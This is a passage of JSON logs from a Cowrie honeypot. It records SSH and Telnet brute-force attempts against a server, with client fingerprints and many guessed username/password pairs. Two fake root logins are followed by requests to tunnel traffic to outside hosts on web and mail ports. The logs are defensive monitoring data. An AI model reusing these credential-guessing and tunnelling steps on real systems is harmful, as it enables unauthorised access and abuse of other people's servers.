-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:03:20.138070Z","src_ip":"185.93.89.7","session":"52d05eb62d2f"}
{"eventid":"cowrie.login.failed","username":"index","password":"12345678","message":"login attempt [index/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T09:03:20.210983Z","src_ip":"185.93.89.7","session":"52d05eb62d2f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:03:21.231213Z","src_ip":"185.93.89.7","session":"52d05eb62d2f"}
{"eventid":"cowrie.session.connect","src_ip":"14.198.213.115","src_port":53430,"dst_ip":"1.2.3.4","dst_port":23,"session":"a671f38848d8","protocol":"telnet","message":"New connection: 14.198.213.115:53430 (1.2.3.4:23) [session: a671f38848d8]","sensor":"my-vps","timestamp":"2025-08-28T09:03:24.355600Z"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":54786,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd0c8dffe71f","protocol":"ssh","message":"New connection: 51.79.164.132:54786 (1.2.3.4:22) [session: cd0c8dffe71f]","sensor":"my-vps","timestamp":"2025-08-28T09:03:30.145143Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:03:30.417773Z","src_ip":"51.79.164.132","session":"cd0c8dffe71f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:03:30.420182Z","src_ip":"51.79.164.132","session":"cd0c8dffe71f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3563,"dst_ip":"1.2.3.4","dst_port":22,"session":"788ed0a0f379","protocol":"ssh","message":"New connection: 212.227.235.229:3563 (1.2.3.4:22) [session: 788ed0a0f379]","sensor":"my-vps","timestamp":"2025-08-28T09:03:31.987247Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:03:31.988414Z","src_ip":"212.227.235.229","session":"788ed0a0f379"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-28T09:03:32.005498Z","src_ip":"51.79.164.132","session":"cd0c8dffe71f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3865,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e5370e54a66","protocol":"ssh","message":"New connection: 212.227.235.229:3865 (1.2.3.4:22) [session: 1e5370e54a66]","sensor":"my-vps","timestamp":"2025-08-28T09:03:32.122562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:03:32.123519Z","src_ip":"212.227.235.229","session":"1e5370e54a66"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T09:03:32.256527Z","src_ip":"212.227.235.229","session":"1e5370e54a66"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:03:32.656472Z","src_ip":"212.227.235.229","session":"1e5370e54a66"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T09:03:32.789931Z","session":"1e5370e54a66"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:03:33.504391Z","src_ip":"51.79.164.132","session":"cd0c8dffe71f"}
{"eventid":"cowrie.session.closed","duration":12.202136516571045,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:03:36.557672Z","src_ip":"14.198.213.115","session":"a671f38848d8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55472,"dst_ip":"1.2.3.4","dst_port":22,"session":"c23b9a846896","protocol":"ssh","message":"New connection: 217.72.205.35:55472 (1.2.3.4:22) [session: c23b9a846896]","sensor":"my-vps","timestamp":"2025-08-28T09:03:39.387318Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:03:39.388811Z","src_ip":"217.72.205.35","session":"c23b9a846896"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":33114,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b9f95b02f78","protocol":"ssh","message":"New connection: 185.93.89.7:33114 (1.2.3.4:22) [session: 7b9f95b02f78]","sensor":"my-vps","timestamp":"2025-08-28T09:03:44.572849Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:03:44.582616Z","src_ip":"185.93.89.7","session":"7b9f95b02f78"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:03:44.623753Z","src_ip":"185.93.89.7","session":"7b9f95b02f78"}
{"eventid":"cowrie.login.failed","username":"index","password":"123456789","message":"login attempt [index/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T09:03:44.745691Z","src_ip":"185.93.89.7","session":"7b9f95b02f78"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:03:45.765487Z","src_ip":"185.93.89.7","session":"7b9f95b02f78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53781,"dst_ip":"1.2.3.4","dst_port":22,"session":"d091fe1e88a9","protocol":"ssh","message":"New connection: 212.227.235.229:53781 (1.2.3.4:22) [session: d091fe1e88a9]","sensor":"my-vps","timestamp":"2025-08-28T09:03:46.642238Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T09:03:46.643343Z","src_ip":"212.227.235.229","session":"d091fe1e88a9"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T09:03:46.771226Z","src_ip":"212.227.235.229","session":"d091fe1e88a9"}
{"eventid":"cowrie.login.success","username":"root","password":"dkagh","message":"login attempt [root/dkagh] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:03:47.336438Z","src_ip":"212.227.235.229","session":"d091fe1e88a9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T09:03:47.467083Z","session":"d091fe1e88a9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T09:03:47.595959Z","src_ip":"212.227.235.229","session":"d091fe1e88a9"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:03:47.726458Z","src_ip":"212.227.235.229","session":"d091fe1e88a9"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":53290,"dst_ip":"1.2.3.4","dst_port":22,"session":"72934c044f37","protocol":"ssh","message":"New connection: 51.79.164.132:53290 (1.2.3.4:22) [session: 72934c044f37]","sensor":"my-vps","timestamp":"2025-08-28T09:03:56.165516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:03:56.752294Z","src_ip":"51.79.164.132","session":"72934c044f37"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:03:56.753422Z","src_ip":"51.79.164.132","session":"72934c044f37"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"elsearch","message":"login attempt [elsearch/elsearch] failed","sensor":"my-vps","timestamp":"2025-08-28T09:04:01.827781Z","src_ip":"51.79.164.132","session":"72934c044f37"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:04:04.150050Z","src_ip":"51.79.164.132","session":"72934c044f37"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":47142,"dst_ip":"1.2.3.4","dst_port":22,"session":"94f1a8370243","protocol":"ssh","message":"New connection: 185.93.89.7:47142 (1.2.3.4:22) [session: 94f1a8370243]","sensor":"my-vps","timestamp":"2025-08-28T09:04:08.776137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:04:08.777069Z","src_ip":"185.93.89.7","session":"94f1a8370243"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:04:08.799363Z","src_ip":"185.93.89.7","session":"94f1a8370243"}
{"eventid":"cowrie.login.failed","username":"index","password":"password","message":"login attempt [index/password] failed","sensor":"my-vps","timestamp":"2025-08-28T09:04:08.838206Z","src_ip":"185.93.89.7","session":"94f1a8370243"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:04:09.859642Z","src_ip":"185.93.89.7","session":"94f1a8370243"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":54562,"dst_ip":"1.2.3.4","dst_port":22,"session":"90dd50549219","protocol":"ssh","message":"New connection: 51.79.164.132:54562 (1.2.3.4:22) [session: 90dd50549219]","sensor":"my-vps","timestamp":"2025-08-28T09:04:22.583736Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:04:22.778578Z","src_ip":"51.79.164.132","session":"90dd50549219"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:04:22.779471Z","src_ip":"51.79.164.132","session":"90dd50549219"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456","message":"login attempt [nginx/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:04:26.497117Z","src_ip":"51.79.164.132","session":"90dd50549219"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62045,"dst_ip":"1.2.3.4","dst_port":22,"session":"d71faea1ffa5","protocol":"ssh","message":"New connection: 212.227.125.160:62045 (1.2.3.4:22) [session: d71faea1ffa5]","sensor":"my-vps","timestamp":"2025-08-28T09:04:27.445965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T09:04:27.459209Z","src_ip":"212.227.125.160","session":"d71faea1ffa5"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T09:04:27.572714Z","src_ip":"212.227.125.160","session":"d71faea1ffa5"}
{"eventid":"cowrie.login.failed","username":"user","password":"chloe","message":"login attempt [user/chloe] failed","sensor":"my-vps","timestamp":"2025-08-28T09:04:28.036921Z","src_ip":"212.227.125.160","session":"d71faea1ffa5"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:04:28.241594Z","src_ip":"51.79.164.132","session":"90dd50549219"}
{"eventid":"cowrie.login.failed","username":"user","password":"astros","message":"login attempt [user/astros] failed","sensor":"my-vps","timestamp":"2025-08-28T09:04:29.125716Z","src_ip":"212.227.125.160","session":"d71faea1ffa5"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234567890q","message":"login attempt [user/1234567890q] failed","sensor":"my-vps","timestamp":"2025-08-28T09:04:30.214439Z","src_ip":"212.227.125.160","session":"d71faea1ffa5"}
{"eventid":"cowrie.login.failed","username":"user","password":"10101010","message":"login attempt [user/10101010] failed","sensor":"my-vps","timestamp":"2025-08-28T09:04:31.340145Z","src_ip":"212.227.125.160","session":"d71faea1ffa5"}
{"eventid":"cowrie.login.failed","username":"user","password":"stephanie","message":"login attempt [user/stephanie] failed","sensor":"my-vps","timestamp":"2025-08-28T09:04:32.457928Z","src_ip":"212.227.125.160","session":"d71faea1ffa5"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":44722,"dst_ip":"1.2.3.4","dst_port":22,"session":"113148d6f0eb","protocol":"ssh","message":"New connection: 185.93.89.7:44722 (1.2.3.4:22) [session: 113148d6f0eb]","sensor":"my-vps","timestamp":"2025-08-28T09:04:32.792873Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:04:32.797788Z","src_ip":"185.93.89.7","session":"113148d6f0eb"}
